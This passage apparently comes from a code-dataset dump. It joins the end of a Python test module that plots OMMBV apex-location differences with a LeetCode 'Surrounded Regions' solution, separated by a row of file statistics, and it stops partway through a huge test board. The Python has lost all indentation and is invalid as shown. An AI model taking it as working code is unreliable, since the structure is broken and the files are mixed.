fig = plt.figure()
plt.imshow(np.log10(apex_alt), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Altitude Difference (km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_loc_diff_h.pdf')
plt.close()
except:
pass
def test_apex_fine_max_step_diff_plots(self):
"""Test apex location info for sensitivity to fine_steps parameters"""
import matplotlib.pyplot as plt
# on_travis = os.environ.get('ONTRAVIS') == 'True'
p_lats, p_longs, p_alts = gen_plot_grid_fixed_alt(550.)
# data returned are the locations along each direction
# the full range of points obtained by iterating over all
# recasting alts into a more convenient form for later calculation
p_alts = [p_alts[0]] * len(p_longs)
# set the date
date = datetime.datetime(2000, 1, 1)
# memory for results
apex_lat = np.zeros((len(p_lats), len(p_longs) + 1))
apex_lon = np.zeros((len(p_lats), len(p_longs) + 1))
apex_alt = np.zeros((len(p_lats), len(p_longs) + 1))
apex_z = np.zeros((len(p_lats), len(p_longs) + 1))
norm_alt = np.zeros((len(p_lats), len(p_longs) + 1))
# set up multi
if self.dc is not None:
import itertools
targets = itertools.cycle(dc.ids)
pending = []
for i, p_lat in enumerate(p_lats):
print (i, p_lat)
# iterate through target cyclicly and run commands
dview.targets = next(targets)
pending.append(dview.apply_async(OMMBV.apex_location_info, [p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
fine_max_steps=5,
return_geodetic=True))
pending.append(dview.apply_async(OMMBV.apex_location_info, [p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
fine_max_steps=10,
return_geodetic=True))
for i, p_lat in enumerate(p_lats):
print ('collecting ', i, p_lat)
# collect output
x, y, z, _, _, h = pending.pop(0).get()
x2, y2, z2, _, _, h2 = pending.pop(0).get()
apex_lat[i, :-1] = np.abs(x2 - x)
apex_lon[i, :-1] = np.abs(y2 - y)
apex_z[i, :-1] = np.abs(z2 - z)
apex_alt[i, :-1] = np.abs(h2 - h)
else:
# single processor case
for i, p_lat in enumerate(p_lats):
print (i, p_lat)
x, y, z, _, _, h = OMMBV.apex_location_info([p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
fine_max_steps=5, return_geodetic=True)
x2, y2, z2, _, _, h2 = OMMBV.apex_location_info([p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
fine_max_steps=10, return_geodetic=True)
norm_alt[i, :-1] = h
apex_lat[i, :-1] = np.abs(x2 - x)
apex_lon[i, :-1] = np.abs(y2 - y)
apex_z[i, :-1] = np.abs(z2 - z)
apex_alt[i, :-1] = np.abs(h2 - h)
# account for periodicity
apex_lat[:, -1] = apex_lat[:, 0]
apex_lon[:, -1] = apex_lon[:, 0]
apex_z[:, -1] = apex_z[:, 0]
apex_alt[:, -1] = apex_alt[:, 0]
norm_alt[:, -1] = norm_alt[:, 0]
idx, idy, = np.where(apex_lat > 10.)
print('Locations with large apex x (ECEF) location differences.', p_lats[idx], p_longs[idx])
ytickarr = np.array([0, 0.25, 0.5, 0.75, 1]) * (len(p_lats) - 1)
xtickarr = np.array([0, 0.2, 0.4, 0.6, 0.8, 1]) * len(p_longs)
ytickvals = ['-50', '-25', '0', '25', '50']
try:
fig = plt.figure()
plt.imshow(np.log10(apex_lat), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Location Difference (ECEF-x km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_loc_max_steps_diff_x.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_lon), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Location Difference (ECEF-y km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_loc_max_steps_diff_y.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_z), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Location Difference (ECEF-z km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_loc_max_steps_diff_z.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_alt / norm_alt), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Altitude Normalized Difference (km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_norm_loc_max_steps_diff_h.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_alt), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Altitude Normalized Difference (km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_loc_max_steps_diff_h.pdf')
plt.close()
except:
pass
def test_ecef_geodetic_apex_diff_plots(self):
"""Characterize uncertainty of ECEF and Geodetic transformations"""
import matplotlib.pyplot as plt
# on_travis = os.environ.get('ONTRAVIS') == 'True'
p_lats, p_longs, p_alts = gen_plot_grid_fixed_alt(550.)
# data returned are the locations along each direction
# the full range of points obtained by iterating over all
# recasting alts into a more convenient form for later calculation
p_alts = [p_alts[0]] * len(p_longs)
# set the date
date = datetime.datetime(2000, 1, 1)
# memory for results
apex_x = np.zeros((len(p_lats), len(p_longs) + 1))
apex_y = np.zeros((len(p_lats), len(p_longs) + 1))
apex_z = np.zeros((len(p_lats), len(p_longs) + 1))
apex_alt = np.zeros((len(p_lats), len(p_longs) + 1))
norm_alt = np.zeros((len(p_lats), len(p_longs) + 1))
# set up multi
if self.dc is not None:
import itertools
targets = itertools.cycle(dc.ids)
pending = []
for i, p_lat in enumerate(p_lats):
print (i, p_lat)
# iterate through target cyclicly and run commands
dview.targets = next(targets)
pending.append(dview.apply_async(OMMBV.geodetic_to_ecef, np.array([p_lat] * len(p_longs)), p_longs,
p_alts))
for i, p_lat in enumerate(p_lats):
print ('collecting ', i, p_lat)
# collect output
x, y, z = pending.pop(0).get()
# iterate through target cyclicly and run commands
dview.targets = next(targets)
pending.append(dview.apply_async(OMMBV.python_ecef_to_geodetic, x, y, z))
for i, p_lat in enumerate(p_lats):
print ('collecting 2', i, p_lat)
# collect output
lat2, lon2, alt2 = pending.pop(0).get()
# iterate through target cyclicly and run commands
dview.targets = next(targets)
pending.append(dview.apply_async(OMMBV.apex_location_info, np.array([p_lat] * len(p_longs)), p_longs,
p_alts, [date] * len(p_longs),
return_geodetic=True))
pending.append(dview.apply_async(OMMBV.apex_location_info, lat2, lon2, alt2,
[date] * len(p_longs),
return_geodetic=True))
for i, p_lat in enumerate(p_lats):
print ('collecting 3', i, p_lat)
x, y, z, _, _, h = pending.pop(0).get()
x2, y2, z2, _, _, h2 = pending.pop(0).get()
norm_alt[i, :-1] = np.abs(h)
apex_x[i, :-1] = np.abs(x2 - x)
apex_y[i, :-1] = np.abs(y2 - y)
apex_z[i, :-1] = np.abs(z2 - z)
apex_alt[i, :-1] = np.abs(h2 - h)
else:
# single processor case
for i, p_lat in enumerate(p_lats):
print (i, p_lat)
x, y, z = OMMBV.geodetic_to_ecef([p_lat] * len(p_longs), p_longs, p_alts)
lat2, lon2, alt2 = OMMBV.ecef_to_geodetic(x, y, z)
x2, y2, z2 = OMMBV.geodetic_to_ecef(lat2, lon2, alt2)
apex_x[i, :-1] = np.abs(x2 - x)
apex_y[i, :-1] = np.abs(y2 - y)
apex_z[i, :-1] = np.abs(z2 - z)
# account for periodicity
apex_x[:, -1] = apex_x[:, 0]
apex_y[:, -1] = apex_y[:, 0]
apex_z[:, -1] = apex_z[:, 0]
apex_alt[:, -1] = apex_alt[:, 0]
norm_alt[:, -1] = norm_alt[:, 0]
ytickarr = np.array([0, 0.25, 0.5, 0.75, 1]) * (len(p_lats) - 1)
xtickarr = np.array([0, 0.2, 0.4, 0.6, 0.8, 1]) * len(p_longs)
ytickvals = ['-50', '-25', '0', '25', '50']
try:
fig = plt.figure()
plt.imshow(np.log10(apex_x), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log ECEF-Geodetic Apex Difference (ECEF-x km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('ecef_geodetic_apex_diff_x.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_y), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log ECEF-Geodetic Apex Difference (ECEF-y km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('ecef_geodetic_apex_diff_y.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_z), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log ECEF-Geodetic Apex Difference (ECEF-z km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('ecef_geodetic_apex_diff_z.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_alt), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log ECEF-Geodetic Apex Altitude Difference (km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('ecef_geodetic_apex_diff_h.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_alt / norm_alt), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log ECEF-Geodetic Apex Normalized Altitude Difference (km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('ecef_geodetic_apex_norm_diff_h.pdf')
plt.close()
except:
pass
| 45.496434 | 117 | 0.492616 | 3,870 | 31,893 | 3.890698 | 0.084238 | 0.019393 | 0.030484 | 0.011158 | 0.834097 | 0.817626 | 0.798964 | 0.786013 | 0.773129 | 0.763897 | 0 | 0.050802 | 0.376634 | 31,893 | 700 | 118 | 45.561429 | 0.706554 | 0.075816 | 0 | 0.705776 | 0 | 0 | 0.103001 | 0.013475 | 0 | 0 | 0 | 0 | 0.001805 | 1 | 0.012635 | false | 0.01083 | 0.032491 | 0 | 0.050542 | 0.028881 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b43becd10230a90c4219b6c64d96fa04f473d700 | 65,435 | py | Python | leetcode/easy/Surrounded_Regions.py | shhuan/algorithms | 2830c7e2ada8dfd3dcdda7c06846116d4f944a27 | [
"MIT"
] | null | null | null | leetcode/easy/Surrounded_Regions.py | shhuan/algorithms | 2830c7e2ada8dfd3dcdda7c06846116d4f944a27 | [
"MIT"
] | null | null | null | leetcode/easy/Surrounded_Regions.py | shhuan/algorithms | 2830c7e2ada8dfd3dcdda7c06846116d4f944a27 | [
"MIT"
] | 1 | 2022-03-09T04:52:55.000Z | 2022-03-09T04:52:55.000Z | # -*- coding: utf-8 -*-
"""
created by huash06 at 2015-04-14 21:37
Given a 2D board containing 'X' and 'O', capture all regions surrounded by 'X'.
A region is captured by flipping all 'O's into 'X's in that surrounded region.
For example,
X X X X
X O O X
X X O X
X O X X
After running your function, the board should be:
X X X X
X X X X
X X X X
X O X X
"""
__author__ = 'huash06'
import sys
import os
class Solution:
# @param board, a 2D array
# Capture all regions by modifying the input board in-place.
# Do not return any value.
def solve(self, board):
if not board:
return
delta = [(-1, 0), (1, 0), (0, -1), (0, 1)]
not_surrounded = set()
for r in range(len(board)):
for c in range(len(board[r])):
if board[r][c] == 'O' and (r, c) not in not_surrounded:
q = [(r, c)]
visited = {(r, c)}
surrounded = True
while q:
loc = q.pop()
# print(loc)
for d in delta:
nr = loc[0] + d[0]
nc = loc[1] + d[1]
if nr < 0 or nr >= len(board) or nc < 0 or nc >= len(board[r]):
surrounded = False
break
nloc = (nr, nc)
if board[nr][nc] == 'O' and nloc not in visited:
visited.add(nloc)
q.append(nloc)
if surrounded:
for loc in visited:
board[loc[0]][loc[1]] = 'X'
else:
not_surrounded = not_surrounded.union(visited)
s = Solution()
board = [
['X', 'X', 'X', 'X'],
['X', 'O', 'O', 'X'],
['X', 'X', 'O', 'X'],
['X', 'O', 'X', 'X']
]
s.solve(board)
for r in board:
print(r)
print('')
board = list(map(list, ["XOX","XOX","XOX"]))
s.solve(board)
for r in board:
print(r)
board = list(map(list, ["OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO